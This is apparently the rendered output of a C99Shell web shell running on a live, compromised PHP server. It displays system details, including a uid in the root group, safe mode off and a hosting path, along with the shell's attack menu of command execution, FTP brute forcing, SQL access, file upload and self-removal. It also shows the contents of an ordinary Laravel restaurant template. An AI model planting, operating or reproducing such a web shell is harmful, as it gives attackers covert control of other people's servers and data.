!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/multirest.picotech.app/public_html/resources/views/restaurant/   drwxr-xr-x
Free 26.6 GB of 117.98 GB (22.55%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     show_custom_restaurant.blade.php (1.99 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
@extends('layouts.dashboard')

@section('title',trans('layout.restaurant').' | '.$restaurant->name)

@section('css')

@endsection

@section('main-content')
    <div id="restaurant-section">

        <div class="row">
            <div class="col-xl-12">
                <div class="card">
                    <div class="card-body">
                        @if($restaurant->cover_image)
                            <div class="photo-content">
                                <div class="cover-wrapper-custom">
                                    <img class="cover-img" src="{{asset('uploads/'.$restaurant->cover_image)}}" alt="">
                                </div>
                            </div>
                        @endif

                        <div class="text-center mt-3">
                            <h2>{{$restaurant->name}}</h2>
                        </div>
                        <div class="text-center">
                            {!! clean($restaurant->description) !!}
                        </div>
                            <hr>
                        <div class="text-center">
                            @foreach($categories as $categoryName=>$categoryItems)
                                <div class="row">
                                    <div class="col-lg-12">
                                    @foreach($categoryItems as $item)
                                        <div data-href="{{asset('uploads/'.$item->image)}}" class="btn custom-button">{{$item->name}}</div>
                                    @endforeach
                                    </div>
                                </div>
                            @endforeach
                        </div>

                    </div>
                </div>
            </div>
        </div>
    </div>

@endsection

@section('js')
    <script !src="">
        $('.custom-button').on('click',function (e) {
            e.preventDefault();
            location.href=$(this).attr('data-href')
        })
    </script>

@endsection

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0039 ]--